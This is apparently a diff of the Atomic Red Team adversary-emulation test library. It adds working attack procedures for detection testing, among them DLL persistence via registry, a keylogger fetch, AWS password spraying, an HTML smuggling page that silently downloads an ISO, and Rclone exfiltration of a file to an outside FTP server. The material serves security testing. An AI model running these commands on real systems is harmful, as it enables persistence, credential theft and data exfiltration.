+          New-Item -Type Directory "PathToAtomicsFolder\T1546\bin\" -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546/bin/AltWinSock2DLL.dll" -OutFile "PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll"
+      executor:
+        command: 'Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters
+          -Name AutodialDLL -Value PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
+
+          '
+        cleanup_command: Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters
+          -Name AutodialDLL -Value  $env:windir\system32\rasadhlp.dll
+        name: powershell
+        elevation_required: true
   T1546.004:
     technique:
       x_mitre_platforms:
@@ -64245,6 +64557,7 @@ persistence:
           description: Path to DLL
           type: Path
           default: PathToAtomicsFolder\T1546.007\bin\NetshHelper.dll
+      dependency_executor_name: powershell
       dependencies:
       - description: 'Helper DLL must exist on disk at specified location (#{helper_file})
 
@@ -64256,9 +64569,9 @@ persistence:
           New-Item -Type Directory (split-path #{helper_file}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll" -OutFile "#{helper_file}"
       executor:
-        command: 'netsh.exe add helper #{helper_file}
-
-          '
+        command: |
+          netsh.exe add helper #{helper_file}
+          taskkill /im notepad.exe /t /f > NUL 2>&1
         cleanup_command: 'netsh.exe delete helper #{helper_file}
 
           '
@@ -65587,10 +65900,19 @@ collection:
           description: Name of the local file, include path.
           type: Path
           default: "$env:TEMP\\key.log"
+      dependencies:
+      - description: 'Get-Keystrokes PowerShell script must exist on disk at PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1
+
+          '
+        prereq_command: 'if (Test-Path PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1)
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: "Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1056.001/src/Get-Keystrokes.ps1
+          -OutFile PathToAtomicsFolder\\T1056.001\\src\\Get-Keystrokes.ps1     \n"
       executor:
-        command: |
-          Set-Location $PathToAtomicsFolder
-          .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath}
+        command: "$PathToAtomicsFolder\\T1056.001\\src\\Get-Keystrokes.ps1 -LogPath
+          #{filepath}\n"
         cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore
 
           '
@@ -71834,10 +72156,19 @@ credential-access:
           description: Name of the local file, include path.
           type: Path
           default: "$env:TEMP\\key.log"
+      dependencies:
+      - description: 'Get-Keystrokes PowerShell script must exist on disk at PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1
+
+          '
+        prereq_command: 'if (Test-Path PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1)
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: "Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1056.001/src/Get-Keystrokes.ps1
+          -OutFile PathToAtomicsFolder\\T1056.001\\src\\Get-Keystrokes.ps1     \n"
       executor:
-        command: |
-          Set-Location $PathToAtomicsFolder
-          .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath}
+        command: "$PathToAtomicsFolder\\T1056.001\\src\\Get-Keystrokes.ps1 -LogPath
+          #{filepath}\n"
         cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore
 
           '
@@ -77452,6 +77783,41 @@ credential-access:
         elevation_required: false
         command: "cd $env:temp\n.\\kerbrute.exe passwordspray --dc #{domaincontroller}
           -d #{domain} $env:temp\\passwordspray.txt password132 \n"
+    - name: AWS - Password Spray an AWS using GoAWSConsoleSpray
+      auto_generated_guid: 9c10d16b-20b1-403a-8e67-50ef7117ed4e
+      description: 'GoAWSConsoleSpray is a tool that can be used to spray AWS IAM
+        Console Credentials in order to identify a valid login for a user account
+        built by WhiteOakSecurity. For more details reagrding the tool, check - https://www.whiteoaksecurity.com/blog/goawsconsolespray-password-spraying-tool/
+
+        '
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        aws_account_id:
+          description: ID of the AWS account
+          type: String
+          default: XXXXXXXX
+      dependencies:
+      - description: 'Check if go is installed
+
+          '
+        prereq_command: 'go version
+
+          '
+        get_prereq_command: 'echo Install GO
+
+          '
+      executor:
+        command: |
+          cd /tmp
+          git clone git@github.com:WhiteOakSecurity/GoAWSConsoleSpray.git
+          cd /tmp/GoAWSConsoleSpray
+          go run main.go GoAWSConsoleSpray -a #{aws_account_id} -u PathToAtomicsFolder/T1110.003/src/aws_users.txt -p PathToAtomicsFolder/T1110.003/src/aws_passwords.txt
+        cleanup_command: 'rm -rf /tmp/GoAWSConsoleSpray
+
+          '
+        name: sh
+        elevation_required: false
   T1056.003:
     technique:
       x_mitre_platforms:
@@ -84967,6 +85333,18 @@ discovery:
           sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
         name: bash
         elevation_required: true
+    - name: DNS Server Discovery Using nslookup
+      auto_generated_guid: 34557863-344a-468f-808b-a1bfb89b4fa9
+      description: |
+        Identify System domain dns controller on an endpoint using nslookup ldap query. This tool is being abused by qakbot malware to gather information on the domain
+        controller of the targeted or compromised host. reference https://securelist.com/qakbot-technical-analysis/103931/
+      supported_platforms:
+      - windows
+      executor:
+        command: 'nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.$env:USERDNSDOMAIN
+
+          '
+        name: command_prompt
   T1087:
     technique:
       x_mitre_platforms:
@@ -102750,3 +103128,56 @@ exfiltration:
            $ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
            $ftp_del.GetResponse()}} catch{}
         name: powershell
+    - name: Exfiltration Over Alternative Protocol - FTP - Rclone
+      auto_generated_guid: b854eb97-bf9b-45ab-a1b5-b94e4880c56b
+      description: |-
+        Rclone may be used by an adversary to exfiltrate data to a publicly hosted FTP server.
+        [Reference](https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/)
+      supported_platforms:
+      - windows
+      input_arguments:
+        ftp_server:
+          description: Your own ftp server
+          type: string
+          default: ftp.dlptest.com
+        ftp_pass:
+          description: Your FTP user's password
+          type: string
+          default: rNrKYTX9g7z3RgJRmxWuGHbeu
+        ftp_user:
+          description: Your FTP username
+          type: string
+          default: dlpuser
+        ftp_port:
+          description: Your FTP's port
+          type: string
+          default: 21
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if the exfil package exists
+
+          '
+        prereq_command: 'if (Test-Path C:\Users\Public\Downloads\exfil.zip) {exit
+          0} else {exit 1}
+
+          '
+        get_prereq_command: 'fsutil file createnew C:\Users\Public\Downloads\exfil.zip
+          20485760
+
+          '
+      - description: Check if rclone zip exists
+        prereq_command: 'if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip)
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip"
+          Expand-Archive C:\Users\Public\Downloads\rclone-current-windows-amd64.zip -DestinationPath C:\Users\Public\Downloads\
+      executor:
+        command: |-
+          $rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
+          $exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
+          &$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
+          &$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate
+        name: powershell
+        elevation_required: true

atomics/T1016/T1016.md

@@ -24,6 +24,8 @@ Adversaries may use the information from [System Network Configuration Discovery
 
 - [Atomic Test #8 - List macOS Firewall Rules](#atomic-test-8---list-macos-firewall-rules)
 
+- [Atomic Test #9 - DNS Server Discovery Using nslookup](#atomic-test-9---dns-server-discovery-using-nslookup)
+
 
 <br/>
 
@@ -371,4 +373,33 @@ sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #9 - DNS Server Discovery Using nslookup
+Identify System domain dns controller on an endpoint using nslookup ldap query. This tool is being abused by qakbot malware to gather information on the domain
+controller of the targeted or compromised host. reference https://securelist.com/qakbot-technical-analysis/103931/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 34557863-344a-468f-808b-a1bfb89b4fa9
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.$env:USERDNSDOMAIN
+```
+
+
+
+
+
+
 <br/>

atomics/T1016/T1016.yaml

@@ -194,4 +194,14 @@ atomic_tests:
       sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
     name: bash
     elevation_required: true
-  
+- name: DNS Server Discovery Using nslookup
+  auto_generated_guid: 34557863-344a-468f-808b-a1bfb89b4fa9
+  description: |
+    Identify System domain dns controller on an endpoint using nslookup ldap query. This tool is being abused by qakbot malware to gather information on the domain
+    controller of the targeted or compromised host. reference https://securelist.com/qakbot-technical-analysis/103931/
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+       nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.$env:USERDNSDOMAIN
+    name: command_prompt

atomics/T1027.006/T1027.006.md

@@ -0,0 +1,59 @@
+# T1027.006 - HTML Smuggling
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/006)
+<blockquote>Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
+
+Adversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as <code>text/plain</code> and/or <code>text/html</code>. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.
+
+For example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as <code>msSaveBlob</code>.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - HTML Smuggling Remote Payload](#atomic-test-1---html-smuggling-remote-payload)
+
+
+<br/>
+
+## Atomic Test #1 - HTML Smuggling Remote Payload
+The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without userinteraction. 
+The HTML file is based off of the work from [Stan Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 30cbeda4-08d9-42f1-8685-197fad677734
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+PathToAtomicsFolder\T1027.006\bin\T1027_006_remote.html
+```
+
+#### Cleanup Commands:
+```powershell
+$user = [System.Environment]::UserName; Remove-Item -Path C:\Users\$user\Downloads\FeelTheBurn.iso
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: T1027_006_remote.html must exist on disk at specified at PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html
+##### Check Prereq Commands:
+```powershell
+if (Test-Path PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html) { exit 0} else { exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\T1027.006\bin\" -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.006/bin/T1027_006_Remote.html" -OutFile "PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html"
+```
+
+
+
+
+<br/>

atomics/T1027.006/T1027.006.yaml

@@ -0,0 +1,27 @@
+attack_technique: T1027.006
+display_name: HTML Smuggling
+atomic_tests:
+
+- name: HTML Smuggling Remote Payload
+  auto_generated_guid: 30cbeda4-08d9-42f1-8685-197fad677734
+  description: |
+    The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without userinteraction. 
+    The HTML file is based off of the work from [Stan Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)
+  supported_platforms:
+  - windows
+  dependencies:
+  - description: |
+      T1027_006_remote.html must exist on disk at specified at PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html
+    prereq_command: |
+      if (Test-Path PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html) { exit 0} else { exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\T1027.006\bin\" -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.006/bin/T1027_006_Remote.html" -OutFile "PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html"
+  executor:
+    command: |
+      PathToAtomicsFolder\T1027.006\bin\T1027_006_remote.html
+    cleanup_command:
+      $user = [System.Environment]::UserName;
+      Remove-Item -Path C:\Users\$user\Downloads\FeelTheBurn.iso
+    name: powershell
+    elevation_required: false

atomics/T1027.006/bin/T1027_006_Remote.html

@@ -0,0 +1,36 @@
+<!-- Based on the template from Stan Hegt: https://outflank.nl/blog/2018/08/14/html-smuggling-explained/ -->
+<html>
+    <head>
+        <title>T1027.006 - HTML Smuggling</title>
+    </head>
+    <body>
+        <p>Nothing to see here...</p>
+
+        <script>
+        function convertFromBase64(base64) {
+            var binary_string = window.atob(base64);
+            var len = binary_string.length;
+            var bytes = new Uint8Array( len );
+            for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
+            return bytes.buffer;
+        }
+        //Base64 encoded link to https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso
+        var file ='aHR0cHM6Ly9naXRodWIuY29tL3JlZGNhbmFyeWNvL2F0b21pYy1yZWQtdGVhbS9ibG9iL2QwZGFkNjJkYmNhZTljNjBjNTE5MzY4ZTgyYzE5NmEzZGI1NzcwNTUvYXRvbWljcy9UMTU1My4wMDUvYmluL0ZlZWxUaGVCdXJuLmlzbz9yYXc9dHJ1ZQ==';
+        var data = convertFromBase64(file);
+        var blob = new Blob([data], {type: 'octet/stream'});
+        var fileName = 'FeelTheBurn.iso';
+
+        if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName);
+        else {
+            var a = document.createElement('a');
+            document.body.appendChild(a);
+            a.style = 'display: none';
+            var url = window.URL.createObjectURL(blob);
+            a.href = url;
+            a.download = fileName;
+            a.click();
+            window.URL.revokeObjectURL(url);
+        }
+        </script>
+    </body>
+</html>

atomics/T1048.003/T1048.003.md

@@ -18,6 +18,8 @@ Adversaries may opt to obfuscate this data, without the use of encryption, withi
 
 - [Atomic Test #6 - MAZE FTP Upload](#atomic-test-6---maze-ftp-upload)
 
+- [Atomic Test #7 - Exfiltration Over Alternative Protocol - FTP - Rclone](#atomic-test-7---exfiltration-over-alternative-protocol---ftp---rclone)
+
 
 <br/>
 
@@ -256,4 +258,66 @@ try {foreach ($file in (dir "$env:windir\temp" "*.7z"))
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #7 - Exfiltration Over Alternative Protocol - FTP - Rclone
+Rclone may be used by an adversary to exfiltrate data to a publicly hosted FTP server.
+[Reference](https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b854eb97-bf9b-45ab-a1b5-b94e4880c56b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ftp_server | Your own ftp server | string | ftp.dlptest.com|
+| ftp_pass | Your FTP user's password | string | rNrKYTX9g7z3RgJRmxWuGHbeu|
+| ftp_user | Your FTP username | string | dlpuser|
+| ftp_port | Your FTP's port | string | 21|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
+$exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
+&$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
+&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if the exfil package exists
+##### Check Prereq Commands:
+```powershell
+if (Test-Path C:\Users\Public\Downloads\exfil.zip) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+fsutil file createnew C:\Users\Public\Downloads\exfil.zip 20485760
+```
+##### Description: Check if rclone zip exists
+##### Check Prereq Commands:
+```powershell
+if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip"
+Expand-Archive C:\Users\Public\Downloads\rclone-current-windows-amd64.zip -DestinationPath C:\Users\Public\Downloads\
+```
+
+
+
+
 <br/>

atomics/T1048.003/T1048.003.yaml

@@ -159,3 +159,49 @@ atomic_tests:
       $ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
       $ftp_del.GetResponse()}} catch{}
     name: powershell
+- name: Exfiltration Over Alternative Protocol - FTP - Rclone
+  auto_generated_guid: b854eb97-bf9b-45ab-a1b5-b94e4880c56b
+  description: |-
+    Rclone may be used by an adversary to exfiltrate data to a publicly hosted FTP server.
+    [Reference](https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/)
+  supported_platforms:
+  - windows
+  input_arguments:
+    ftp_server:
+      description: Your own ftp server
+      type: string
+      default: ftp.dlptest.com
+    ftp_pass:
+      description: Your FTP user's password
+      type: string
+      default: rNrKYTX9g7z3RgJRmxWuGHbeu
+    ftp_user:
+      description: Your FTP username
+      type: string
+      default: dlpuser
+    ftp_port:
+      description: Your FTP's port
+      type: string
+      default: 21
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Check if the exfil package exists
+    prereq_command: |
+      if (Test-Path C:\Users\Public\Downloads\exfil.zip) {exit 0} else {exit 1}
+    get_prereq_command: | 
+      fsutil file createnew C:\Users\Public\Downloads\exfil.zip 20485760
+  - description: 'Check if rclone zip exists'
+    prereq_command: | 
+      if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip"
+      Expand-Archive C:\Users\Public\Downloads\rclone-current-windows-amd64.zip -DestinationPath C:\Users\Public\Downloads\
+  executor:
+    command: |-
+      $rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
+      $exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
+      &$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
+      &$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate
+    name: powershell
+    elevation_required: true

atomics/T1056.001/T1056.001.md

@@ -55,8 +55,7 @@ Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and outp
 
 
 ```powershell
-Set-Location $PathToAtomicsFolder
-.\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath}
+$PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath}
 ```
 
 #### Cleanup Commands:
@@ -66,6 +65,18 @@ Remove-Item $env:TEMP\key.log -ErrorAction Ignore
 
 
 
+#### Dependencies:  Run with `powershell`!
+##### Description: Get-Keystrokes PowerShell script must exist on disk at PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1
+##### Check Prereq Commands:
+```powershell
+if (Test-Path PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1056.001/src/Get-Keystrokes.ps1 -OutFile PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1
+```
+
+
 
 
 <br/>

atomics/T1056.001/T1056.001.yaml

@@ -16,10 +16,16 @@ atomic_tests:
       description: Name of the local file, include path.
       type: Path
       default: $env:TEMP\key.log
+  dependencies:
+  - description: |
+      Get-Keystrokes PowerShell script must exist on disk at PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1
+    prereq_command: |
+      if (Test-Path PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1056.001/src/Get-Keystrokes.ps1 -OutFile PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1     
   executor:
     command: |
-      Set-Location $PathToAtomicsFolder
-      .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath}
+      $PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath}
     cleanup_command: |
       Remove-Item $env:TEMP\key.log -ErrorAction Ignore
     name: powershell

atomics/T1070.003/T1070.003.md

@@ -342,7 +342,7 @@ Prevents Powershell history
 
 
 ```powershell
-Set-PSReadlineOption –HistorySaveStyle SaveNothing
+Set-PSReadlineOption -HistorySaveStyle SaveNothing
 ```
 
 #### Cleanup Commands:

atomics/T1070.003/T1070.003.yaml

@@ -128,7 +128,7 @@ atomic_tests:
   - windows
   executor:
     command: |
-       Set-PSReadlineOption –HistorySaveStyle SaveNothing
+       Set-PSReadlineOption -HistorySaveStyle SaveNothing
     name: powershell
     cleanup_command: 'Set-PSReadLineOption -HistorySaveStyle SaveIncrementally'
     

atomics/T1110.003/T1110.003.md

@@ -39,6 +39,8 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
 
 - [Atomic Test #8 - Password Spray using Kerbrute Tool](#atomic-test-8---password-spray-using-kerbrute-tool)
 
+- [Atomic Test #9 - AWS - Password Spray an AWS using GoAWSConsoleSpray](#atomic-test-9---aws---password-spray-an-aws-using-goawsconsolespray)
+
 
 <br/>
 
@@ -463,4 +465,56 @@ invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/at
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #9 - AWS - Password Spray an AWS using GoAWSConsoleSpray
+GoAWSConsoleSpray is a tool that can be used to spray AWS IAM Console Credentials in order to identify a valid login for a user account built by WhiteOakSecurity. For more details reagrding the tool, check - https://www.whiteoaksecurity.com/blog/goawsconsolespray-password-spraying-tool/
+
+**Supported Platforms:** Iaas:aws
+
+
+**auto_generated_guid:** 9c10d16b-20b1-403a-8e67-50ef7117ed4e
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| aws_account_id | ID of the AWS account | String | XXXXXXXX|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+cd /tmp
+git clone git@github.com:WhiteOakSecurity/GoAWSConsoleSpray.git
+cd /tmp/GoAWSConsoleSpray
+go run main.go GoAWSConsoleSpray -a #{aws_account_id} -u PathToAtomicsFolder/T1110.003/src/aws_users.txt -p PathToAtomicsFolder/T1110.003/src/aws_passwords.txt
+```
+
+#### Cleanup Commands:
+```sh
+rm -rf /tmp/GoAWSConsoleSpray
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Check if go is installed
+##### Check Prereq Commands:
+```sh
+go version
+```
+##### Get Prereq Commands:
+```sh
+echo Install GO
+```
+
+
+
+
 <br/>

atomics/T1110.003/T1110.003.yaml

@@ -288,4 +288,31 @@ atomic_tests:
     command: |
       cd $env:temp
       .\kerbrute.exe passwordspray --dc #{domaincontroller} -d #{domain} $env:temp\passwordspray.txt password132 
-      
+- name: AWS - Password Spray an AWS using GoAWSConsoleSpray
+  auto_generated_guid: 9c10d16b-20b1-403a-8e67-50ef7117ed4e
+  description: |
+    GoAWSConsoleSpray is a tool that can be used to spray AWS IAM Console Credentials in order to identify a valid login for a user account built by WhiteOakSecurity. For more details reagrding the tool, check - https://www.whiteoaksecurity.com/blog/goawsconsolespray-password-spraying-tool/
+  supported_platforms:
+  - iaas:aws
+  input_arguments:
+    aws_account_id:
+      description: ID of the AWS account
+      type: String
+      default: "XXXXXXXX"
+  dependencies:
+    - description: |
+        Check if go is installed
+      prereq_command: |
+        go version
+      get_prereq_command: |
+        echo Install GO
+  executor:
+    command: |
+       cd /tmp
+       git clone git@github.com:WhiteOakSecurity/GoAWSConsoleSpray.git
+       cd /tmp/GoAWSConsoleSpray
+       go run main.go GoAWSConsoleSpray -a #{aws_account_id} -u PathToAtomicsFolder/T1110.003/src/aws_users.txt -p PathToAtomicsFolder/T1110.003/src/aws_passwords.txt
+    cleanup_command: |
+       rm -rf /tmp/GoAWSConsoleSpray
+    name: sh
+    elevation_required: false

atomics/T1110.003/src/aws_passwords.txt

@@ -0,0 +1,2 @@
+password
+password2

atomics/T1110.003/src/aws_users.txt

@@ -0,0 +1,2 @@
+user1
+user2

atomics/T1505.003/T1505.003.md

@@ -29,7 +29,7 @@ cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | web_shell_path | The path to drop the web shell | String | C:\inetpub\wwwroot|
-| web_shells | Path of Web Shell | Path | PathToAtomicsFolder\T1505.003\src\|
+| web_shells | Path of Web Shell | Path | PathToAtomicsFolder\T1505.003\src|
 
 
 #### Attack Commands: Run with `command_prompt`! 

atomics/T1505.003/T1505.003.yaml

@@ -17,7 +17,7 @@ atomic_tests:
     web_shells:
       description: Path of Web Shell
       type: Path
-      default: PathToAtomicsFolder\T1505.003\src\
+      default: PathToAtomicsFolder\T1505.003\src
   dependency_executor_name: powershell
   dependencies:
   - description: |

atomics/T1546.007/T1546.007.md

@@ -38,6 +38,7 @@ The NetshHelper.dll provided with the atomic will simply launch notepad when net
 
 ```cmd
 netsh.exe add helper #{helper_file}
+taskkill /im notepad.exe /t /f > NUL 2>&1
 ```
 
 #### Cleanup Commands:
@@ -47,14 +48,14 @@ netsh.exe delete helper #{helper_file}
 
 
 
-#### Dependencies:  Run with `command_prompt`!
+#### Dependencies:  Run with `powershell`!
 ##### Description: Helper DLL must exist on disk at specified location (#{helper_file})
 ##### Check Prereq Commands:
-```cmd
+```powershell
 if (Test-Path "#{helper_file}") { exit 0} else { exit 1}
 ```
 ##### Get Prereq Commands:
-```cmd
+```powershell
 New-Item -Type Directory (split-path #{helper_file}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll" -OutFile "#{helper_file}"
 ```

atomics/T1546.007/T1546.007.yaml

@@ -16,6 +16,7 @@ atomic_tests:
       description: Path to DLL
       type: Path
       default: PathToAtomicsFolder\T1546.007\bin\NetshHelper.dll
+  dependency_executor_name: powershell
   dependencies:
   - description: |
       Helper DLL must exist on disk at specified location (#{helper_file})
@@ -27,7 +28,8 @@ atomic_tests:
   executor:
     command: |
       netsh.exe add helper #{helper_file}
+      taskkill /im notepad.exe /t /f > NUL 2>&1
     cleanup_command: |
       netsh.exe delete helper #{helper_file}
     name: command_prompt
-    elevation_required: true
+    elevation_required: true

atomics/T1546/T1546.md

@@ -0,0 +1,61 @@
+# T1546 - Event Triggered Execution
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1546)
+<blockquote>Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. 
+
